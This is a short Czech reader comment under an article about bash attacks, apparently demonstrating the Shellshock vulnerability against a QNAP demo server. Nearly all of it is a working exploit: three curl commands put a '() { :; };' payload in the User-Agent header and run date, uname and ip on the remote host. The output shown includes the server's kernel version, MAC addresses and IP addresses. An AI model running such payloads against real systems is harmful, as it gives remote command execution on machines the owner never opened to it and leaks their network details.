Názor ke článku Útoky na bash už běží od Lol Phirae - 14: No, s tím opravdu nic nenadělám. Předpokládám,...

14: No, s tím opravdu nic nenadělám. Předpokládám, že výpis dole se totálně rozsype.

# curl -sS -A "() { :; }; echo Content-Type: text/plain; echo; echo; /bin/date" http://demo.qnap.com:8080/cgi-bin/index.cgi
Tue Sep 30 08:43:35 BST 2014
Location:/cgi-bin/login.html?201406­09

# curl -sS -A "() { :; }; echo Content-Type: text/plain; echo; echo; /bin/uname -a" http://demo.qnap.com:8080/cgi-bin/index.cgi
Linux DemoSite 3.4.6 #1 SMP Mon Jun 9 10:17:41 CST 2014 x86_64 unknown
Location:/cgi-bin/login.html?201406­09

# curl -sS -A "() { :; }; echo Content-Type: text/plain; echo; echo; /bin/ip a s" http://demo.qnap.com:8080/cgi-bin/index.cgi

1: lo: mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
2: eth0: mtu 1500 qdisc pfifo_fast state DOWN qlen 1000
link/ether 00:08:9b:d3:72:74 brd ff:ff:ff:ff:ff:ff
3: eth2: mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:08:9b:d3:72:76 brd ff:ff:ff:ff:ff:ff
inet 192.168.100.116/24 brd 192.168.100.255 scope global eth2
4: eth3: mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:08:9b:d3:72:77 brd ff:ff:ff:ff:ff:ff
inet 211.78.89.107/27 brd 211.78.89.127 scope global eth3
5: eth1: mtu 1500 qdisc pfifo_fast state DOWN qlen 1000
link/ether 00:08:9b:d3:72:75 brd ff:ff:ff:ff:ff:ff
Location:/cgi-bin/login.html?201406­09